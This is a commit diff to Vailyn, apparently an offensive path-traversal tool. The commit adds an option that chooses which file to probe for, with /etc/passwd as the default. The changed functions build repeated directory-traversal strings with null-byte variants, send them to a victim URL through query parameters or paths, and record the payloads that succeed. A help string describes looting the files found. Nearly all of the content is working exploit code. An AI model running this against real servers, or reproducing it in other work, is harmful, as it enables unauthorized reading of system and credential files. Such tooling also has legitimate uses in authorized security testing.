Added new argument for custom file in phase 1

.directory

@@ -1,5 +1,5 @@
 [Desktop Entry]
-Icon=/home/vainlystrain/Pictures/dagger.png
+Icon=/home/vainlystrain/Pictures/VailynIcon111v.png
 
 [Dolphin]
 Timestamp=2019,8,31,14,13,42

Vailyn

@@ -72,6 +72,7 @@ def main() -> int:
     foundfiles = [""]
     foundurls = [""]
     foundpayloads = []
+    vlnfile = "/etc/passwd"
 
     if opt["loot"]:
         loot = True
@@ -87,6 +88,9 @@ def main() -> int:
 
     if opt["summary"]:
         summary = True
+
+    if opt["check"]:
+        vlnfile = args.check
 
     iter=1
     ndirs=list.copy(sdirs)
@@ -116,7 +120,7 @@ def main() -> int:
         #test for the vulnerability
         m = 12
         with Pool(processes=processes) as pool:
-            res = [pool.apply_async(determine_payloads_query, args=(args.victim,victim2,args.param,verbose,m,l,)) for l in paysplit]
+            res = [pool.apply_async(determine_payloads_query, args=(args.victim,victim2,args.param,verbose,m,l,vlnfile,)) for l in paysplit]
             for i in res:
                 pays = i.get()
                 foundpayloads += pays
@@ -153,7 +157,7 @@ def main() -> int:
         #test for the vulnerability
         m = 12
         with Pool(processes=processes) as pool:
-            res = [pool.apply_async(determine_payloads_inpath, args=(args.victim,victim2,args.param,verbose,m,l,)) for l in paysplit]
+            res = [pool.apply_async(determine_payloads_inpath, args=(args.victim,victim2,args.param,verbose,m,l,vlnfile,)) for l in paysplit]
             for i in res:
                 pays = i.get()
                 foundpayloads += pays

core/methods/inpath.py

@@ -79,45 +79,41 @@ def inpath(url,url2,keyword,files,dirs,depth,verbose,dl,summary,selected_payload
     return (found, urls)
 
 
-def determine_payloads_inpath(url,url2,keyword,verbose,depth,paylist):
+def determine_payloads_inpath(url,url2,keyword,verbose,depth,paylist,file):
     payloads = []
-    linchk = "etc/passwd"
-    #winchk = "" TODO
-    files = [linchk]
     s = session()
     con2 = requests.get(url).content
-    for file in files:
-        for i in paylist:
-            d = 5
-            while d <= depth:
-                traverse=''
-                j=1
-                while j <= d:
-                    traverse+=i
-                    j+=1
-                requestlist = []
-                path = traverse+file+url2
-                req = requests.Request(method='GET', url=url)
-                prep = req.prepare()
-                prep.url = url + path
-                r = s.send(prep)
-                requestlist.append(r)
-                path2=traverse+file+"%00"+url2
-                req = requests.Request(method='GET', url=url)
-                prep = req.prepare()
-                prep.url = url + path2
-                r = s.send(prep)
-                requestlist.append(r)
-                found = False
-                for r in requestlist:
-                    if str(r.status_code).startswith("2") or r.status_code == 302: # or r.status_code == 403:
-                        if filecheck(r.content, con2):
-                            payloads.append(i)
-                            found = True
-                            print(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + i)
-                d+=1
-                if found:
-                    break
+    for i in paylist:
+        d = 5
+        while d <= depth:
+            traverse=''
+            j=1
+            while j <= d:
+                traverse+=i
+                j+=1
+            requestlist = []
+            path = traverse+file+url2
+            req = requests.Request(method='GET', url=url)
+            prep = req.prepare()
+            prep.url = url + path
+            r = s.send(prep)
+            requestlist.append(r)
+            path2=traverse+file+"%00"+url2
+            req = requests.Request(method='GET', url=url)
+            prep = req.prepare()
+            prep.url = url + path2
+            r = s.send(prep)
+            requestlist.append(r)
+            found = False
+            for r in requestlist:
+                if str(r.status_code).startswith("2") or r.status_code == 302: # or r.status_code == 403:
+                    if filecheck(r.content, con2):
+                        payloads.append(i)
+                        found = True
+                        print(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + i)
+            d+=1
+            if found:
+                break
 
     return payloads
 

core/methods/parser.py

@@ -37,14 +37,15 @@ def print_help(self):
   -d INT, --depth INT   {0}max. nr of ../ and dir permutation level [int]{1}
   -f, --verbosity       {0}display every path tried, even 404s{1}
   -n, --loot            {0}Download found files into the loot folder{1}
-  -c VIC2, --vic2 VIC2  {0}Attack Target, part 2 (post injection point){1}'''.format(color.RC, color.END))
+  -c FIL, --check FIL   {0}File to check for in Phase 1 (df: /etc/passwd){1}
+  --vic2 VIC2           {0}Attack Target, part 2 (post injection point){1}'''.format(color.RC, color.END))
 
 class VainFormatter(argparse.RawDescriptionHelpFormatter):
     def add_usage(self, usage, actions, groups, prefix=None):
         if prefix is None:
-            prefix = color.RC + 'Vsynta.: ' + color.END
+            prefix = color.RC + 'Vsynta ' + color.END
             #return super(VainFormatter, self).add_usage("{}Vailyn{} [-v VIC] [-a ACK] [-p PARAM] [-s]\n          [-l FIL PATH] [-d INT] [--loot]\n        [-f] [-h] [--vic2 VIC2]".format(color.RB,color.END), actions, groups, prefix)
-            return super(VainFormatter, self).add_usage("{}Vailyn{} -v VIC -a ACK -l FIL PATH\n          [-p PAM] [-s] [-d INT] [-f]\n        [-n] [-c VIC2]".format(color.RB,color.END), actions, groups, prefix)
+            return super(VainFormatter, self).add_usage("{}Vailyn{} -v VIC -a ACK -l FIL PATH [-s]\n        [-p PAM] [-q VIC2] [-d INT] \n      [-n] [-c FIL] [-f]".format(color.RB,color.END), actions, groups, prefix)
 
 def build_parser():
     p = ArgumentParser(formatter_class=VainFormatter,add_help=False)
@@ -79,8 +80,11 @@ def build_parser():
     p.add_argument('-n', '--loot',
                    help="1 › Download found files into loot",
                    action="store_true")
-    p.add_argument('-c', '--vic2',
+    p.add_argument('-q', '--vic2',
                    help="A › Attack target part 2",
                    metavar=("VIC2"))
+    p.add_argument('-c', '--check',
+                   help="A › Attack target part 2",
+                   metavar=("FILE"))
 
     return p 

core/methods/query.py

@@ -71,44 +71,40 @@ def query(url,url2,keyword,files,dirs,depth,verbose,dl,summary, selected_payload
                 d+=1
     return (found, urls)
 
-def determine_payloads_query(url,url2,keyword,verbose,depth,paylist):
+def determine_payloads_query(url,url2,keyword,verbose,depth,paylist, file):
     payloads = []
-    linchk = "etc/passwd"
-    #winchk = "" TODO
-    files = [linchk]
     s = session()
     con2 = requests.get(url).content
-    for file in files:
-        for i in paylist:
-            d = 5
-            while d <= depth:
-                traverse=''
-                j=1
-                while j <= d:
-                    traverse+=i
-                    j+=1
-                requestlist = []
-                query = "?"+keyword+"="+traverse+file+url2
-                req = requests.Request(method='GET', url=url)
-                prep = req.prepare()
-                prep.url = url + query
-                r = s.send(prep)
-                requestlist.append(r)
-                query2="?"+keyword+"="+traverse+file+"%00"+url2
-                req = requests.Request(method='GET', url=url)
-                prep = req.prepare()
-                prep.url = url + query2
-                r = s.send(prep)
-                requestlist.append(r)
-                found = False
-                for r in requestlist:
-                    if str(r.status_code).startswith("2") or r.status_code == 302 or r.status_code == 403:
-                        if filecheck(r.content, con2):
-                            payloads.append(i)
-                            found = True
-                            print(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + i)
-                d+=1
-                if found:
-                    break
+    for i in paylist:
+        d = 5
+        while d <= depth:
+            traverse=''
+            j=1
+            while j <= d:
+                traverse+=i
+                j+=1
+            requestlist = []
+            query = "?"+keyword+"="+traverse+file+url2
+            req = requests.Request(method='GET', url=url)
+            prep = req.prepare()
+            prep.url = url + query
+            r = s.send(prep)
+            requestlist.append(r)
+            query2="?"+keyword+"="+traverse+file+"%00"+url2
+            req = requests.Request(method='GET', url=url)
+            prep = req.prepare()
+            prep.url = url + query2
+            r = s.send(prep)
+            requestlist.append(r)
+            found = False
+            for r in requestlist:
+                if str(r.status_code).startswith("2") or r.status_code == 302 or r.status_code == 403:
+                    if filecheck(r.content, con2):
+                        payloads.append(i)
+                        found = True
+                        print(color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + i)
+            d+=1
+            if found:
+                break
 
     return payloads